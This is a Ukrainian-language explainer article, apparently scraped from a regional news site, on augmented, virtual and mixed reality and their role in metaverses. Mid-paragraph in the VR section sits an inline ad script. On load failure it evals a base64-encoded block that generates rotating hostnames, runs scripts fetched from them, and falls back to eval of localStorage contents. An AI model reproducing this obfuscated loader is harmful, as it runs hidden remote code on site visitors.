Нереальні реальності та їх роль у метавсесвітах

Технології віртуальної та доповненої реальності стають все більш актуальними в міру того, як метавсесвіт відвойовує життєвий простір у матеріального світу. Тим більше дивно, що мало хто знає, що являють собою ці види «нереальної реальності» і в чому їх відмінності.

Що таке доповнена реальність?

Доповнена реальність (Augmented Reality, AR) – це технологія, яка розширює сприйняття користувача і збагачує його уявлення про реальний світ за допомогою цифрової інформації через додавання зображень, звуку, відео та інших віртуальних деталей.

Найчастіше для створення доповненої реальності не потрібно спеціального обладнання, оскільки вона генерується звичайними пристроями, в основному, смартфонами. Віртуальні тривимірні (3D) об’єкти накладаються системою доповненої реальності на об’єкти реального світу в режимі реального часу на основі їх геометричних співвідношень, при цьому система сама обчислює їх положення та орієнтацію в просторі. Комбіноване зображення зазвичай проєктується на мобільні екрани, окуляри доповненої реальності та інші пристрої.

Прикладами систем доповненої реальності є додатки для оформлення інтер’єру, наприклад, IKEA, а також віртуальні ігри, такі як Pokemon Go. Крім того, AR широко використовується в маркетингу та медичних додатках.

Що таке віртуальна реальність?

Віртуальна реальність (Virtual Reality, VR) – це технологія, яка використовує цифрові 3D-зображення і Відео для створення у користувачів ілюзії занурення в цифрову тривимірну середу, що володіє масштабами, близькими до матеріального світу. Для відтворення реального або уявного світу системи віртуальної реальності використовують штучний інтелект і просунуту графіку, які здатні додати глибину, змінити масштаб і відстань між статичними двовимірними (2D) зображеннями. Це дозволяє замінити реальність на імітований світ, створюючи ефект занурення, завдяки якому користувач відчуває себе частиною згенерованого комп’ютером навколишнього простору.

Для вивчення та управління 3D-середовищем користувачі використовують комп’ютери та сенсорні пристрої, зокрема гарнітури віртуальної реальності та рукавички.

Приклади віртуальної реальності включають розважальні програми, такі як відеоігри, наприклад, серія цивільних симуляторів польоту Microsoft Flight Simulator VR, іммерсивний картковий симулятор PokerStars VR або реалістичний симулятор перегонів Assetto Corsa VR; а також освітні та бізнес-програми, такі як Rumii або Engage – віртуальні простори, які дозволяють людям співпрацювати та спілкуватися в одній кімнаті з будь-якої точки світу.

Доповнена реальність та віртуальна реальність: відмінності

Важлива відмінність між цими технологіями полягає в тому, що VR намагається замінити реальний світ аж до повного занурення, тоді як AR додає віртуальні об’єкти, проєктуючи цифрову інформацію поверх навколишнього простору, який користувачі бачать у реальному світі.

VR пристрої вимагають відключення користувачів від реальності, блокуючи їх поле зору, щоб замість цього показувати VR-контент. Ось чому віртуальну реальність найкраще пізнавати за допомогою спеціального обладнання – віртуальної гарнітури та рукавичок. У той час як AR запросто можна використовувати навіть у двовимірних середовищах, наприклад, на смартфоні.

Переваги та недоліки доповненої реальності

Однією з головних переваг AR є можливість використання цієї технології для освіти. AR має потенціал для підвищення знань та обізнаності користувачів, розширюючи їх досвід. Завдяки технології доповненої реальності користувачі можуть обмінюватися інформацією з іншими людьми в режимі реального часу на великих відстанях.

Серед інших переваг AR — простота використання додатків, оскільки системи доповненої реальності менше залежать від можливостей пристрою, надаючи більше свободи користувачам смартфонів. Потрібно просто навести камеру на об’єкт, і додаток AR покаже, що воно робить з цим конкретним об’єктом. Проте, для створення об’єктів з високою роздільною здатністю і реалістичністю як і раніше потрібна висока пропускна здатність каналів зв’язку.

Крім того, великою перевагою AR є те, що зараз вона використовується в різних сферах, таких як ігри, маркетинг, освіта та охорона здоров’я, а також має безліч програм для навчання, навігації, дизайну та розваг (Snapchat, Google Lens, IKEA Place тощо).

Основним недоліком AR залишається недостатня конфіденційність та безпека технології. Крім того, залишається невисоким рівень її впровадження і застосування в повсякденному житті користувачів. Залишаються складними та дорогими розробка, впровадження та підтримка проєктів.

Крім того, надмірна взаємодія з АR може спричинити проблеми зі здоров’ям. Занадто часте та інтенсивне проведення часу в АR може призвести до порушення зору, ожиріння та психічних розладів.

Переваги та недоліки віртуальної реальності

Перш за все, VR дозволяє створити реалістичний світ, що дає користувачам можливість досліджувати інтерактивне середовище та експериментувати з ним. Віртуальна реальність справляє глибше враження у порівнянні з AR з точки зору занурення та відчуття віртуальної присутності. Це дає користувачам, які грають в ігри або переглядають відео, враження, що вони дійсно знаходяться в іншому світі. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Крім того, VR полегшує навчання, включаючи практичні заняття, робить їх простішими, безпечнішими і комфортнішими для користувачів. Можливість проведення тренувань і відпрацювання потенційно небезпечних реальних операцій, таких як хірургічне втручання, політ на літаку або бойові дії, без будь-якого ризику шляхом їх моделювання є одним з важливих переваг технології.

З іншого боку, навчання у віртуальному середовищі ніколи не дає такого ж результату, як практика та робота в реальному світі, і це один із суттєвих недоліків VR. Якщо користувач добре справляється з модельованими завданнями у створеному 3D-середовищі віртуальної реальності, це не гарантує, що він буде виконувати ті самі завдання так само добре в реальному світі.

Крім того, висока вартість систем віртуальної реальності перешкоджає їх рутинному використанню.

Можливі також і проблеми зі здоров’ям. Деякі користувачі відчувають тимчасові побічні ефекти, такі як погіршення зору, головний біль та нудота.

Ще однією проблемою є небезпека ескапізму, який став звичним явищем серед користувачів VR. VR викликає більше позитивних емоцій у порівнянні з реальністю, що в кінцевому підсумку призводить деяких користувачів до ізоляції та відлюдництва.

Що таке змішана реальність?

Термін змішана реальність (Mixed Reality, MR) відноситься до гібрида AR і VR, злиття віртуального і фізичного світів для створення нового середовища, в якому в режимі реального часу можлива взаємодія між віртуальними та фізичними об’єктами.

На відміну від систем VR, які повністю занурюють користувачів у віртуальне середовище, і від доповненої реальності, яка накладає цифровий контент поверх реального світу, не беручи до уваги його унікальну і динамічну структуру, системи MR постійно збирають нову інформацію про навколишнє середовище і про те, що в ньому відбувається. MR об’єднує віртуальний і фізичний світи так, що вони переплітаються.

MR швидко розвивається. Ряд програм MR використовується у сфері розваг, освіти, дизайну, охорони здоров’я, військового вишколу, маркетингу та віддаленої роботи – цей список зростає.

Роль віртуальної реальності та доповненої реальності в метавсесвітах

Метавсесвіт являє собою модельоване цифрове середовище, яке поєднує в собі безліч елементів різних технологій, включаючи AR, VR, MR і блокчейн, а також концепцію соціальних мереж для створення інтерактивного простору, що імітує реальний світ.

Метавсесвіт повинен змінити спосіб взаємодії людей один з одним, з’єднавши віртуальний і фізичний світи в загальний віртуальний тривимірний простір, що володіє онлайн-інфраструктурою, де в реальному часі відбуваються події, і який постійно змінюється під впливом своїх мешканців.

Реальне і віртуальне об’єднуються в метавсесвіті з використанням технологій AR і VR, що грають ключову роль у формуванні нового світу.

VR є основним компонентом екосистеми метавсесвіту, який надає користувачам можливість випробувати захопливі пригоди в динамічному віртуальному 3D-середовищі. Взагалі метавсесвіт – це те, у що користувачі можуть зануритися (через VR), плюс те, що вони можуть привнести у свою реальність (через AR).

Останнім часом концепція метавсесвіту стала однією з найпопулярніших тенденцій в технологічній сфері, особливо після оголошення Facebook про ребрендинг в Meta, а також після того, як гіганти на кшталт Microsoft, Google і Sony почали створювати свої унікальні платформи цифрових світів і інвестувати в них.

Нині існує безліч метавсесвітів, наприклад, популярний віртуальний світ Decentraland (MANA), натхненна покемонами гра метавсесвіт Axie Infinity (AXS), цифрова ігрова платформа The Sandbox (SAND) і всесвіт DEXART (NEAR), що динамічно розвивається. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/nerealni-realnosti-ta-yih-rol-u-metavsesvitah/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top